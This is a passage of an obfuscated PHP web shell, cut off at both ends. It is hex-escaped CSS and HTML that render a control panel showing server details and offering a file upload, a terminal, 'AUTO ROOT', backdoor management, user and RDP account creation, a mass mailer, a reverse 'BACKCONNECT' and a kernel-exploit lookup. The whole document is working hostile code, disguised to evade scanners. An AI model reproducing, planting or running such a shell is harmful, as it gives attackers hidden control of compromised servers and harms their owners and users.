::-w\x65\x62k\x69t-\x73\x63r\x6fl\x6c\x62\x61\x72-\x74h\x75mb:ho\x76er\x20{\n  \x20 \x20\x20\x20     ba\x63k\x67\x72\x6fund:\x20#55\x35\n\x20    \x20\x20\x20}\n\n\x20\x20\x20    \x20::-\x77ebk\x69t-f\x69l\x65-\x75p\x6c\x6fad-\x62\x75\x74ton {\n  \x20 \x20   \x20\x20\x20\x20d\x69\x73pl\x61\x79:\x20n\x6f\x6ee\n\x20 \x20  \x20\x20 }\n\n\x20   \x20   \x2emodal\x20{\n\x20   \x20\x20\x20\x20\x20 \x20\x20display:\x20\x6eone;\n\x20\x20 \x20    \x20\x20 \x20z-\x69\x6e\x64\x65\x78:\x202;\n\x20 \x20  \x20 \x20\x20  \x20\x77\x69\x64\x74\x68:\x2010\x30\x25\x3b\n \x20 \x20   \x20\x20   bac\x6b\x67\x72o\x75\x6e\x64-\x63ol\x6fr:\x20\x72\x67b\x61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, \x30, .\x33)\n\x20\x20      }\n\n\x20\x20  \x20\x20 \x20.mod\x61l-\x63on\x74\x61\x69n\x65r {\n \x20\x20\x20 \x20\x20\x20\x20   an\x69ma\x74\x69\x6f\x6e-na\x6de: \x6d\x6fdal-p\x6fp-o\x75\x74\x3b\n\x20  \x20\x20\x20\x20 \x20\x20\x20\x20\x61ni\x6dat\x69o\x6e-d\x75ration: \x2e7s;\n\x20   \x20 \x20 \x20\x20\x20\x20an\x69ma\x74\x69o\x6e-fil\x6c-\x6d\x6f\x64\x65: bo\x74\x68;\n \x20\x20\x20\x20      \x20m\x61\x72gin:\x2010\x25 a\x75\x74\x6f \x61ut\x6f\x3b\n\x20\x20         \x20\x62o\x72\x64\x65\x72-\x72\x61di\x75\x73: 1\x30px\x3b\n \x20 \x20\x20\x20\x20\x20   \x20\x77i\x64\x74\x68: 8\x300px\x3b\n \x20 \x20 \x20\x20  \x20\x20\x20ba\x63\x6bgro\x75\x6e\x64-\x63\x6flo\x72:\x20#f4f4f\x39\n\x20 \x20\x20    }\n\n\x20\x20      \x40\x6b\x65y\x66r\x61me\x73\x20\x6d\x6f\x64\x61\x6c-\x70\x6f\x70-out\x20{\n \x20      \x20\x20  \x66rom\x20{\n\x20  \x20\x20 \x20 \x20\x20 \x20\x20   o\x70a\x63\x69\x74\x79:\x200\n\x20\x20\x20\x20\x20\x20\x20 \x20\x20  }\n\n\x20\x20\x20\x20 \x20\x20\x20  \x20\x20\x74\x6f {\n\x20\x20\x20\x20\x20   \x20\x20\x20 \x20\x20  \x6f\x70a\x63\x69\x74y:\x20\x31\n \x20\x20\x20  \x20\x20 \x20 \x20}\n   \x20  \x20\x20}\n\n  \x20    \x20.\x6dodal-\x68\x65a\x64e\x72\x20{\n\x20  \x20   \x20 \x20  c\x6flo\x72: \x23\x3000;\n\x20\x20\x20  \x20 \x20\x20\x20 \x20\x6d\x61\x72g\x69\x6e-\x6ceft:\x2030px;\n\x20\x20  \x20\x20    \x20\x20p\x61\x64\x64\x69\x6e\x67: \x31\x30px\n   \x20\x20 \x20 }\n\n \x20\x20  \x20  .\x6do\x64\x61\x6c-\x62\x6fd\x79,\n\x20\x20 \x20    .termina\x6c-head\x20l\x69 {\n\x20  \x20\x20 \x20 \x20\x20 \x20\x63olo\x72:\x20\x23\x30\x30\x30\n \x20\x20\x20\x20 \x20\x20}\n\n \x20  \x20\x20\x20 \x2e\x6d\x6f\x64a\x6c-c\x72\x65a\x74\x65-\x69nput {\n\x20 \x20  \x20\x20    \x20wid\x74h:\x2070\x30\x70\x78;\n\x20\x20\x20\x20 \x20 \x20\x20 \x20\x20pa\x64di\x6e\x67: 10p\x78 5\x70\x78;\n\x20\x20 \x20 \x20  \x20 \x20\x20\x62a\x63\x6b\x67ro\x75\x6ed-\x63olor: #f4\x66\x34f\x39\x3b\n\x20\x20\x20   \x20\x20\x20\x20\x20\x20mar\x67\x69\x6e: \x30\x205%;\n      \x20\x20\x20\x20 \x20b\x6fr\x64\x65r: \x6eon\x65\x3b\n \x20 \x20\x20    \x20\x20\x20b\x6f\x72d\x65\x72-\x72a\x64iu\x73: \x34\x70\x78\x3b\n \x20 \x20  \x20\x20 \x20  bo\x78-s\x68\x61\x64\x6f\x77: \x38\x70\x78\x208px\x2020px rgba(\x30,\x200,\x200,\x20.\x32);\n    \x20\x20\x20   \x20 \x62\x6f\x72\x64er-bo\x74\x74\x6fm: 2p\x78\x20s\x6fli\x64\x20\x23\x30\x650f\x31\x37\n\x20\x20 \x20   \x20}\n\n\x20\x20 \x20\x20  \x20.b\x6f\x78-sh\x61dow {\n  \x20\x20\x20\x20  \x20 \x20 box-\x73\x68\x61do\x77: \x38\x70x\x208px\x20\x38p\x78\x20\x72g\x62\x61(\x30,\x200, 0, .\x32)\n\x20 \x20\x20 \x20\x20 }\n\n\x20\x20\x20\x20    \x2ebt\x6e-\x6dodal-clos\x65 {\n\x20  \x20   \x20 \x20 \x20\x62\x61\x63\x6b\x67\x72\x6fu\x6ed-\x63\x6f\x6c\x6f\x72:\x20#2\x32\x324\x32d\x3b\n\x20  \x20 \x20  \x20\x20\x20 \x63\x6f\x6c\x6fr: \x23\x66f\x66\x3b\n \x20 \x20\x20\x20 \x20\x20 \x20 \x62\x6fr\x64\x65\x72:\x20\x6e\x6fn\x65;\n\x20  \x20 \x20\x20 \x20 \x20\x20bo\x72\x64\x65\x72-\x72ad\x69us:\x20\x34\x70\x78\x3b\n \x20\x20\x20\x20  \x20   \x20paddi\x6eg:\x20\x38\x70x\x2035\x70x\n    \x20 \x20 }\n\n\x20    \x20 \x20.b\x61\x64\x67e-a\x63\x74\x69on-chmo\x64:\x68\x6fv\x65\x72::\x61\x66\x74\x65\x72,\n \x20  \x20\x20\x20\x20.b\x61\x64g\x65-a\x63ti\x6fn-d\x6fw\x6el\x6f\x61\x64:\x68over::\x61f\x74e\x72,\n \x20\x20\x20\x20\x20\x20\x20.\x62\x61\x64ge-ac\x74io\x6e-ed\x69t\x6f\x72:h\x6fver::\x61f\x74\x65r\x20{\n\x20\x20  \x20 \x20\x20 \x20  \x70\x61\x64\x64i\x6e\x67:\x20\x35\x70x;\n\x20\x20  \x20   \x20\x20\x20 b\x6f\x72de\x72-\x72\x61\x64i\x75\x73:\x205p\x78\x3b\n \x20 \x20\x20 \x20\x20 \x20 \x20mar\x67in-\x6ce\x66t:\x20\x3110p\x78\x3b\n \x20\x20  \x20  \x20 \x20\x20\x62\x61ckgr\x6f\x75\x6e\x64-\x63\x6f\x6c\x6f\x72: \x23\x32\x65313d\n \x20 \x20\x20\x20\x20\x20}\n\n\x20   \x20 \x20\x20\x2em\x6fda\x6c-b\x74n-f\x6frm\x20{\n\x20\x20  \x20  \x20\x20  \x20ma\x72\x67i\x6e:\x20\x31\x35px\x200\x3b\n\x20\x20\x20  \x20 \x20  \x20\x20pa\x64\x64ing:\x20\x310\x70x\x3b\n  \x20\x20 \x20\x20\x20\x20  \x20\x74ext-\x61l\x69\x67\x6e:\x20rig\x68\x74\n\x20\x20 \x20 \x20 \x20}\n\n\x20 \x20\x20 \x20  .\x66ile-si\x7a\x65\x20{\n\x20\x20  \x20 \x20 \x20 \x20\x20\x63\x6f\x6cor:\x20o\x72\x61n\x67e\n \x20\x20\x20    }\n\n\x20 \x20\x20\x20\x20 \x20\x2e\x62\x61\x64g\x65-roo\x74::a\x66\x74\x65r {\n\x20 \x20\x20\x20   \x20\x20\x20\x20\x63on\x74e\x6e\x74:\x20\x22roo\x74\"\x3b\n\x20\x20\x20\x20\x20 \x20  \x20\x20 di\x73pla\x79: b\x6co\x63k\x3b\n  \x20\x20  \x20 \x20\x20\x20 p\x6f\x73\x69\x74\x69\x6fn: a\x62s\x6f\x6cut\x65\x3b\n     \x20\x20\x20\x20\x20 \x20\x77\x69\x64\x74\x68:\x20\x34\x30px;\n\x20  \x20\x20\x20\x20\x20\x20\x20 \x20t\x65x\x74-ali\x67\x6e: cen\x74e\x72\x3b\n\x20\x20  \x20 \x20 \x20\x20\x20 \x6darg\x69n-t\x6fp: -30p\x78;\n     \x20\x20\x20   \x20\x6d\x61rgin-\x6ce\x66t: \x311\x30\x70x;\n\x20\x20 \x20\x20 \x20\x20    bo\x72\x64er-r\x61\x64i\x75\x73: 4p\x78\x3b\n \x20\x20    \x20  \x20\x20\x62\x61ck\x67\x72ound-\x63\x6flo\x72: r\x65d\n \x20\x20\x20\x20   }\n\n\x20 \x20 \x20\x20\x20 .ba\x64\x67e-a\x63t\x69o\x6e-c\x68m\x6f\x64:ho\x76\x65r::\x61\x66ter,\n \x20 \x20   \x20\x2eb\x61\x64ge-\x61\x63\x74\x69o\x6e-\x64o\x77\x6e\x6c\x6f\x61\x64:h\x6fve\x72::a\x66\x74\x65\x72,\n  \x20  \x20\x20 .\x62adg\x65-\x61\x63\x74ion-ed\x69t\x6fr:hov\x65\x72::\x61ft\x65\x72,\n\x20  \x20 \x20  \x2eb\x61\x64g\x65-lin\x75x::afte\x72,\n \x20 \x20\x20 \x20 \x2e\x62\x61d\x67e-\x77\x69ndo\x77\x73::\x61\x66\x74er {\n\x20\x20  \x20\x20   \x20\x20 \x77idt\x68: \x36\x30px;\n\x20 \x20\x20  \x20\x20 \x20 \x20\x74\x65x\x74-\x61li\x67\x6e: c\x65nter\x3b\n\x20 \x20 \x20\x20 \x20 \x20 \x20\x6darg\x69n-t\x6fp:\x20-30p\x78\x3b\n\x20\x20  \x20\x20\x20\x20\x20  \x20\x64\x69\x73\x70l\x61y:\x20b\x6cock\x3b\n \x20  \x20\x20 \x20\x20  \x20posi\x74\x69on: \x61\x62\x73ol\x75\x74e\n\x20     \x20 }\n\n\x20 \x20 \x20  \x20.\x62\x61\x64g\x65-w\x69\x6edo\x77\x73::a\x66\x74\x65\x72 {\n \x20\x20    \x20\x20 \x20\x20\x62\x61ck\x67\x72ou\x6ed-co\x6c\x6f\x72: o\x72\x61ng\x65;\n \x20\x20 \x20 \x20\x20\x20\x20  col\x6f\x72: #0\x300;\n\x20\x20  \x20   \x20  \x20mar\x67in-\x6c\x65\x66t: \x31\x300\x70\x78\x3b\n \x20 \x20\x20 \x20   \x20 \x62\x6frd\x65\x72-\x72adi\x75\x73: \x34p\x78;\n  \x20    \x20 \x20\x20\x20c\x6fntent:\x20\x22w\x69\x6e\x64ows\"\n\x20\x20\x20 \x20  \x20}\n\n   \x20\x20 \x20 \x2e\x62\x61\x64\x67\x65-l\x69n\x75\x78::\x61\x66\x74\x65r {\n\x20\x20\x20  \x20  \x20\x20\x20\x20\x6dar\x67\x69n-\x6c\x65\x66\x74: \x31\x300\x70\x78\x3b\n\x20   \x20      \x20\x62\x6fr\x64er-ra\x64\x69\x75\x73: \x34\x70x\x3b\n \x20\x20\x20\x20\x20 \x20\x20\x20  b\x61\x63kgroun\x64-c\x6flo\x72:\x20\x230\x304\x37a3;\n \x20\x20  \x20\x20     \x63o\x6e\x74e\x6et:\x20\"l\x69nu\x78\x22\n   \x20  \x20 }\n\n\x20\x20\x20\x20\x20 \x20 \x2e\x62\x61\x64g\x65-\x61c\x74\x69\x6f\x6e-\x65d\x69t\x6f\x72:\x68\x6fv\x65r::a\x66\x74e\x72 {\n  \x20\x20   \x20\x20\x20 \x20c\x6f\x6etent: \x22\x52\x65n\x61me\x22\n\x20\x20\x20 \x20 \x20\x20}\n\n \x20\x20 \x20 \x20 \x2eb\x61\x64ge-actio\x6e-c\x68\x6do\x64:h\x6fve\x72::\x61f\x74er {\n\x20\x20  \x20 \x20\x20 \x20  c\x6f\x6e\x74\x65nt:\x20\"Ch\x6d\x6fd\x22\n  \x20   \x20 }\n\n\x20   \x20\x20  \x2e\x62a\x64\x67\x65-actio\x6e-downl\x6f\x61\x64:ho\x76\x65r::a\x66\x74\x65\x72\x20{\n\x20 \x20   \x20    \x20\x63o\x6et\x65\x6e\x74:\x20\x22Do\x77n\x6c\x6f\x61d\x22\n     \x20\x20\x20}\n\n\x20\x20  \x20 \x20 \x2eco\x64e-ed\x69\x74\x6fr,\n\x20 \x20 \x20 \x20 \x2et\x65\x72\x6din\x61l\x20{\n  \x20 \x20\x20\x20 \x20\x20\x20 ba\x63k\x67roun\x64-c\x6fl\x6f\x72:\x20r\x67\x62a(\x30, 0,\x20\x30,\x20.\x33)\x3b\n\x20     \x20\x20\x20\x20  w\x69\x64th:\x20\x310\x30%\n \x20\x20\x20\x20   }\n\n   \x20\x20\x20  .co\x64\x65-edito\x72-c\x6f\x6et\x61\x69\x6ee\x72 {\n\x20\x20\x20\x20 \x20\x20\x20 \x20 \x20ba\x63kg\x72\x6fund-\x63\x6f\x6cor: #f4f4\x669\x3b\n \x20\x20\x20 \x20   \x20 \x20c\x6f\x6c\x6fr:\x20\x23\x30\x300\x3b\n  \x20\x20\x20  \x20\x20\x20 \x20widt\x68: \x390%\x3b\n\x20  \x20\x20\x20\x20\x20\x20 \x20\x20\x6d\x61\x72gi\x6e: \x340p\x78 a\x75\x74\x6f\x20a\x75t\x6f\x3b\n\x20   \x20  \x20    bo\x72\x64e\x72-ra\x64iu\x73: \x310\x70\x78\n\x20\x20  \x20\x20 \x20}\n\n \x20    \x20\x20.\x63\x6f\x64\x65-edi\x74\x6f\x72-\x68ead {\n\x20\x20    \x20  \x20  pad\x64in\x67:\x20\x31\x35px\x3b\n\x20\x20 \x20\x20\x20 \x20\x20  \x20\x66o\x6et-w\x65i\x67\x68\x74:\x20\x37\x300\n\x20 \x20\x20\x20\x20\x20 }\n\n\x20 \x20  \x20\x20\x20\x2e\x63ode-ed\x69\x74or-\x62\x6fdy \x74\x65\x78\x74\x61\x72ea {\n\x20\x20  \x20 \x20\x20\x20\x20 \x20bor\x64\x65r-rad\x69us: 4\x70\x78\x3b\n\x20 \x20 \x20 \x20\x20\x20\x20\x20\x20\x6da\x72gi\x6e:\x200 4px;\n \x20\x20\x20   \x20    height: 70vh;\n\x20        \x20 \x20\x62\x61c\x6bg\x72oun\x64-co\x6c\x6fr:\x20#2\x32\x32\x342d\x3b\n\x20\x20\x20\x20 \x20\x20\x20\x20\x20 \x20c\x6f\x6cor: \x23f\x66\x66\n  \x20 \x20 \x20\x20}\n\n    \x20\x20\x20\x20.\x74erm\x69nal-\x63o\x6eta\x69n\x65r\x20{\n \x20 \x20 \x20 \x20\x20 \x20\x20\x61\x6eimat\x69o\x6e:\x20\x2e5s bot\x68\x20moda\x6c-p\x6fp-out;\n\x20 \x20   \x20 \x20\x20 \x20wi\x64\x74\x68: 9\x30\x25;\n      \x20  \x20\x20 \x62ac\x6bgr\x6fun\x64-\x63o\x6cor:\x20#f4f4f9;\n\x20\x20\x20  \x20 \x20 \x20\x20\x20ma\x72\x67i\x6e: 2\x35px a\x75\x74\x6f \x61\x75to\x3b\n \x20\x20 \x20 \x20\x20 \x20  \x63\x6f\x6cor:\x20\x230\x300;\n  \x20\x20   \x20   \x20\x62or\x64\x65\x72-ra\x64\x69\x75s:\x204\x70x\n\x20\x20\x20\x20\x20\x20  }\n\n \x20\x20\x20  \x20\x20\x2eb\x63-ge\x63ko,\n   \x20  \x20 .m\x61il,\n\x20    \x20 \x20.\x74\x65\x72m\x69n\x61\x6c-i\x6eput {\n   \x20 \x20  \x20 \x20\x20ba\x63\x6bg\x72\x6f\x75nd-\x63o\x6cor:\x20#2\x32242d\x3b\n\x20\x20  \x20\x20\x20\x20   \x20c\x6flor: \x23\x66f\x66\n  \x20  \x20\x20\x20}\n\n\x20\x20 \x20    \x2e\x74e\x72\x6di\x6ea\x6c-\x68e\x61d\x20{\n \x20\x20   \x20    \x20pa\x64d\x69ng: \x38\x70\x78\n\x20\x20\x20\x20\x20\x20  }\n\n\x20  \x20\x20 \x20\x20.t\x65\x72m\x69\x6e\x61\x6c-\x68ea\x64 \x6ci\x20a\x20{\n \x20\x20   \x20   \x20 colo\x72:\x20#\x300\x30\x3b\n \x20 \x20  \x20   \x20 \x70\x6fsit\x69\x6fn: abs\x6f\x6c\x75t\x65\x3b\n\x20\x20 \x20\x20 \x20\x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20rig\x68\x74:\x200;\n\x20 \x20\x20  \x20  \x20\x20\x20m\x61rgi\x6e-ri\x67h\x74: \x31\x31\x30p\x78\x3b\n\x20  \x20\x20\x20\x20\x20 \x20\x20\x20f\x6fnt-\x77\x65\x69\x67h\x74:\x207\x30\x30\x3b\n  \x20 \x20  \x20 \x20 \x20\x6d\x61\x72g\x69\x6e-t\x6f\x70:\x20-20px;\n \x20\x20\x20 \x20    \x20\x20fo\x6et-\x73\x69\x7ae: \x325px;\n\x20\x20 \x20 \x20 \x20\x20\x20\x20\x20pad\x64\x69\x6eg: \x31p\x78\x2010p\x78\n \x20\x20\x20    }\n\n\x20\x20 \x20\x20   .t\x65\x72m\x69na\x6c-\x62od\x79 t\x65xta\x72ea {\n\x20\x20  \x20  \x20  \x20 mar\x67in: \x34px;\n \x20\x20  \x20  \x20  \x20b\x61\x63\x6b\x67\x72\x6fu\x6e\x64-c\x6f\x6cor: #2\x32\x3242d\x3b\n   \x20       \x20c\x6fl\x6fr:\x20\x23\x32\x39d\x6212;\n\x20\x20   \x20\x20\x20 \x20  \x62\x6frde\x72-r\x61\x64iu\x73:\x204\x70\x78\n  \x20 \x20\x20\x20\x20}\n\n\x20\x20 \x20\x20\x20\x20\x20.act\x69\x76e {\n \x20\x20 \x20\x20\x20\x20 \x20 \x20\x64i\x73\x70\x6cay:\x20bl\x6f\x63k\n\x20\x20\x20   \x20 }\n\n      \x20\x20\x2et\x65\x72\x6dinal-\x69np\x75t\x20{\n\x20    \x20\x20     wi\x64t\x68: 50\x30p\x78;\n \x20 \x20\x20\x20   \x20\x20 p\x61d\x64\x69\x6eg: 6p\x78\x3b\n    \x20 \x20\x20\x20\x20  \x62\x6fr\x64\x65r: 1\x70x solid #\x32\x32\x324\x32\x64\x3b\n \x20  \x20   \x20  \x20\x62\x6f\x72d\x65\x72-\x72\x61dius:\x20\x34\x70\x78;\n \x20\x20\x20\x20\x20 \x20   \x20\x6d\x61rgi\x6e: \x35\x70\x78\x20\x30\n    \x20   }\n\n\x20 \x20  \x20\x20\x20\x2eb\x63-geck\x6f {\n   \x20 \x20 \x20\x20\x20\x20 \x62\x6f\x72de\x72:\x20\x6eon\x65\x3b\n\x20\x20\x20    \x20\x20\x20  \x70\x61ddi\x6eg:\x207px\x201\x30\x70x\x3b\n     \x20\x20\x20    widt\x68: 7\x312p\x78\x3b\n\x20\x20    \x20\x20\x20 \x20 bor\x64er-\x72\x61\x64\x69u\x73: \x35px\x3b\n\x20 \x20 \x20\x20\x20 \x20   m\x61\x72gin: 1\x35\x70\x78\x2040\x70\x78\n\x20 \x20 \x20 \x20\x20}\n\n\x20 \x20 \x20\x20  \x2e\x6dai\x6c {\n   \x20\x20 \x20 \x20\x20 \x20width:\x20\x37\x30\x35\x70\x78;\n\x20  \x20\x20\x20      r\x65\x73\x69z\x65: \x6eo\x6ee;\n\x20\x20 \x20 \x20\x20  \x20\x20 \x68\x65\x69\x67\x68t: \x31\x300\x70x\n\x20   \x20\x20\x20\x20}\n\n  \x20\x20 \x20 \x20.lo\x67o-\x67\x65c\x6bo\x20{\n\x20   \x20  \x20   \x20\x70o\x73i\x74\x69\x6f\x6e:\x20\x61\x62\x73\x6f\x6c\x75te\x3b\n  \x20\x20  \x20 \x20\x20  \x74\x6f\x70: -9\x30p\x78\x3b\n\x20\x20 \x20  \x20\x20 \x20\x20\x20r\x69\x67ht:\x20\x340px;\n \x20 \x20   \x20   \x20z-\x69\x6edex: -1\x3b\n  \x20 \x20 \x20\x20\x20 \x20\x20\x62ott\x6fm:\x20\x30\n \x20  \x20 \x20\x20}\n    &lt;/s\x74yle\x3e\n\x3c/\x68ead&gt;\n\n&lt;\x62\x6f\x64y\x3e\n\x20\x20\x20\x20\x3c\x64\x69v\x20\x63\x6c\x61\x73\x73=\x22\x6de\x6eu-\x68\x65ad\x65r\x22&gt;\n\x20\x20\x20 \x20  \x20&lt;\x75l&gt;\n  \x20\x20\x20\x20  \x20\x20\x20\x20&lt;\x6c\x69&gt;&lt;i \x63las\x73=\x22fa-\x73ol\x69\x64\x20fa-\x63om\x70\x75\x74\x65\x72\x22\x3e\x3c/\x69&gt;&amp;nb\x73\x70\x3b";echo ${$hqmsvsrew}[8]();${"\x47\x4cO\x42A\x4cS"}["\x68b\x73\x63\x6e\x69\x6co\x6a\x70"]="\x70w\x64";echo "\x3c/l\x69&gt;\n \x20\x20\x20\x20 \x20\x20 \x20 \x20&lt;\x6ci&gt;\x3ci\x20cl\x61\x73s\x3d\x22\x66\x61-\x73oli\x64 f\x61-\x73\x65\x72\x76er\"&gt;\x3c/i&gt;\x26\x6e\x62\x73\x70\x3b";$rdwgifctzya="pw\x64";$njgyvkx="f\x75ng\x73\x69";${"\x47\x4c\x4fB\x41\x4c\x53"}["b\x62\x70x\x71\x71\x62x\x75v\x63"]="\x66u\x6e\x67\x73\x69";$wmqfjsqcgfy="fu\x6e\x67\x73\x69";$gceotac="\x66i\x6c\x65_\x6d\x61na\x67\x65r";echo $_SERVER["\x53\x45\x52\x56\x45\x52\x5f\x53\x4f\x46\x54\x57\x41\x52\x45"];echo "\x3c/\x6ci&gt;\n   \x20\x20 \x20 \x20\x20\x20\x20\x3c\x6ci&gt;\x3ci cl\x61ss\x3d\x22\x66\x61-s\x6fl\x69\x64 f\x61-\x6e\x65\x74\x77\x6fr\x6b-w\x69\x72ed\x22\x3e&lt;/\x69\x3e&amp;n\x62\x73p;: ";echo $_SERVER["\x53\x45\x52\x56\x45\x52\x5f\x41\x44\x44\x52"];echo " |\x26nb\x73p;:\x20";echo $_SERVER["\x52\x45\x4d\x4f\x54\x45\x5f\x41\x44\x44\x52"];echo "&lt;/\x6ci&gt;\n\x20  \x20\x20\x20\x20 \x20 \x20 \x3c\x6c\x69\x3e&lt;\x69\x20c\x6ca\x73\x73\x3d\x22\x66\x61-\x73\x6flid\x20f\x61-g\x6c\x6fbe\"\x3e&lt;/i\x3e&amp;\x6eb\x73p;";echo s();echo "\x3c/li\x3e\n \x20\x20\x20 \x20\x20 \x20\x20 \x20\x3cl\x69&gt;&lt;\x69 cl\x61\x73s=\"fa-\x62ran\x64s\x20\x66a-ph\x70\x22\x3e&lt;/\x69\x3e&amp;nbsp;";echo PHP_VERSION;echo "&lt;/\x6ci\x3e\n\x20\x20    \x20 \x20   &lt;l\x69\x3e\x3c\x69 c\x6c\x61ss=\"\x66\x61-\x73\x6fl\x69\x64\x20\x66\x61-\x75se\x72\"&gt;\x3c/\x69\x3e&amp;n\x62s\x70;";echo ${${"G\x4c\x4f\x42\x41\x4cS"}["bp\x66ca\x6d"]}[9]();echo "&lt;/\x6ci\x3e\n  \x20 \x20  \x20 \x20 \x20\x3c\x6c\x69 \x63\x6cass=\x22l\x6fgo-gec\x6bo\"\x3e\x3cim\x67\x20\x77\x69\x64\x74h\x3d\x22400\x22\x20hei\x67\x68t=\x224\x300\" \x73r\x63\x3d\x22\x67\x65c\x6b\x6f1.p\x6e\x67\x22\x20al\x69gn=\x22ri\x67\x68t\"&gt;&lt;/li\x3e\n\x20 \x20\x20  \x20\x20  \x20\x20&lt;fo\x72\x6d\x20\x61c\x74\x69\x6fn=\x22\" m\x65\x74\x68\x6f\x64\x3d\"p\x6fs\x74\" encty\x70\x65='";$qkbbnppc="\x66\x75\x6egs\x69";echo "\x6d\x75\x6c\x74\x69\x70\x61\x72\x74\x2f\x66\x6f\x72\x6d\x2d\x64\x61\x74\x61";echo "'&gt;\n  \x20\x20   \x20\x20 \x20\x20\x20\x20 \x20&lt;li\x20\x63l\x61s\x73=\"\x66orm-upl\x6fad\x22\x3e&lt;i\x6eput\x20\x74\x79pe=\"\x73\x75b\x6d\x69\x74\x22 \x76\x61\x6cue=\"\x55\x70load\"\x20na\x6d\x65=\x22\x67\x65c\x6bo-\x75p-s\x75\x62\x6d\x69t\"\x20\x63las\x73=\"\x62t\x6e-\x73\x75bmi\x74\"&gt;\x26n\x62s\x70;\x3c\x69\x6e\x70ut \x74\x79pe\x3d\"f\x69l\x65\x22 name=\x22ge\x63\x6bo-u\x70\x6c\x6f\x61\x64\" \x63l\x61ss=\"\x66or\x6d-f\x69l\x65\"\x3e\x3c/\x6ci\x3e\n \x20     \x20\x20\x20\x20 \x3c/f\x6f\x72\x6d\x3e\n\x20\x20  \x20\x20  &lt;/u\x6c\x3e\n\x20   \x3c/div&gt;\n  \x20 \x3c\x64i\x76\x20\x63\x6cas\x73=\x22men\x75-t\x6f\x6fls\x22\x3e\n  \x20\x20\x20\x20\x20\x20&lt;\x75\x6c\x3e\n \x20  \x20\x20\x20\x20\x20  \x20\x3c\x6c\x69\x3e\x3c\x61 hr\x65f=\x22?d\x3d";echo hx(${${"G\x4c\x4f\x42\x41L\x53"}["o\x6a\x77l\x74\x72"]}[0]());echo "&amp;t\x65\x72min\x61\x6c=nor\x6d\x61\x6c\" cl\x61ss=\"b\x74\x6e-s\x75b\x6d\x69t\x22&gt;Te\x72\x6di\x6e\x61\x6c&lt;/a&gt;&lt;/li&gt;\n      \x20\x20 \x20  \x3cl\x69&gt;&lt;a hr\x65f\x3d\"?\x64=";echo hx(${$njgyvkx}[0]());echo "\x26t\x65r\x6di\x6e\x61\x6c\x3droo\x74\x22 \x63las\x73\x3d\x22\x62\x74\x6e-s\x75bm\x69t b\x61d\x67e-\x72\x6f\x6f\x74\x22&gt;\x41UTO RO\x4f\x54&lt;/a\x3e&lt;/\x6c\x69\x3e\n \x20\x20  \x20\x20\x20  \x20\x20\x3c\x6c\x69\x3e&lt;\x61\x20h\x72e\x66\x3d\"?\x64\x3d";echo hx(${${"\x47\x4c\x4fBAL\x53"}["\x62\x62\x70x\x71\x71\x62\x78u\x76\x63"]}[0]());echo "&amp;a\x64mine\x72\"\x20c\x6c\x61\x73\x73=\"\x62t\x6e-\x73ub\x6d\x69\x74\x22&gt;A\x64\x6d\x69ne\x72&lt;/\x61&gt;&lt;/\x6ci&gt;\n   \x20     \x20 \x20&lt;li\x3e&lt;\x61\x20\x68\x72e\x66\x3d\x22?\x64=";echo hx(${$wmqfjsqcgfy}[0]());echo "&amp;de\x73\x74ro\x79\x22\x20cl\x61ss=\"\x62\x74\x6e-\x73\x75bm\x69\x74\x22\x3eB\x61\x63\x6b\x64o\x6f\x72 \x44est\x72oyer&lt;/a\x3e&lt;/\x6ci&gt;\n\x20 \x20\x20\x20\x20\x20    \x20&lt;li&gt;\x3ca\x20h\x72e\x66=\x22//www.e\x78\x70lo\x69\x74-\x64\x62.\x63\x6f\x6d/\x73e\x61rc\x68?\x71=\x4c\x69n\x75\x78\x25\x32\x30\x4berne\x6c\x252\x30";echo suggest_exploit();echo "\"\x20\x63\x6cass=\"b\x74n-s\x75\x62\x6di\x74\"&gt;\x4ci\x6eu\x78 E\x78\x70l\x6f\x69\x74\x3c/\x61\x3e&lt;/\x6ci&gt;\n   \x20\x20\x20\x20  \x20\x20 \x3cl\x69&gt;\x3ca \x68ref\x3d\x22?d=";echo hx(${${"G\x4c\x4fB\x41\x4c\x53"}["\x67\x78v\x79\x67\x74"]}[0]());echo "&amp;lo\x63\x6bs\x68\x65\x6c\x6c\x22 \x63lass\x3d\"b\x74\x6e-\x73\x75\x62\x6d\x69\x74\x22\x3e\x4c\x6fck \x53\x68e\x6c\x6c\x3c/\x61\x3e\x3c/\x6ci\x3e\n\x20   \x20 \x20  \x20  &lt;l\x69&gt;&lt;\x61 \x68\x72ef\x3d\x22\x22 c\x6c\x61s\x73=\"b\x74\x6e-subm\x69t\x20ba\x64\x67\x65-\x6cin\x75\x78\"\x20id\x3d\x22\x6co\x63\x6b-f\x69le\x22\x3eLo\x63\x6b \x46il\x65&lt;/a\x3e&lt;/li\x3e\n\x20 \x20      \x20  &lt;li&gt;\x3ca \x68\x72\x65f\x3d\"\x22 \x63\x6c\x61\x73s=\x22b\x74n-sub\x6di\x74 \x62\x61\x64\x67\x65-\x72oo\x74\" id=\x22r\x6f\x6f\x74-\x75\x73e\x72\"&gt;C\x72e\x61t\x65 U\x73er\x3c/\x61\x3e\x3c/li&gt;\n  \x20\x20\x20  \x20\x20\x20\x20 &lt;\x6ci\x3e\x3c\x61\x20\x68r\x65\x66\x3d\"\x22 c\x6cass\x3d\x22\x62\x74\x6e-\x73\x75\x62\x6di\x74\"\x20\x69d=\"cr\x65ate-\x72\x64p\x22&gt;CR\x45\x41TE\x20RDP&lt;/\x61&gt;\x3c/li&gt;\n \x20\x20 \x20    \x20\x20\x20&lt;li\x3e\x3c\x61\x20\x68\x72e\x66\x3d\x22?d\x3d";echo hx(${${"G\x4c\x4fBA\x4c\x53"}["h\x67\x75\x61\x6e\x71\x64d"]}[0]());echo "\x26mailer\" \x63\x6cas\x73=\x22\x62\x74\x6e-\x73ub\x6di\x74\"&gt;PHP \x4dail\x65\x72&lt;/\x61&gt;\x3c/l\x69&gt;\n\x20    \x20 \x20\x20\x20\x20\x20&lt;l\x69\x3e\x3ca\x20href\x3d\x22?\x64\x3d";echo hx(${$qkbbnppc}[0]());echo "\x26b\x61ck\x63\x6fnn\x65c\x74\x22\x20c\x6cass\x3d\"btn-s\x75b\x6dit\"&gt;BA\x43\x4b\x43O\x4eN\x45C\x54&lt;/a&gt;\x3c/li&gt;\n\x20\x20 \x20   \x20  \x20\x20&lt;\x6ci&gt;&lt;a \x68r\x65\x66\x3d\"?\x64\x3d";echo hx(${$xwvqjmtohbor}[0]());echo "&amp;\x75\x6e\x6co\x63ks\x68ell\x22 cl\x61ss=\"\x62\x74\x6e-s\x75bmi\x74\x22\x3eU\x4eLOCK \x53HELL\x3c/\x61&gt;\x3c/l\x69&gt;\n\x20  \x20 \x20\x20\x20\x20 \x20\x20&lt;\x6c\x69\x3e&lt;a 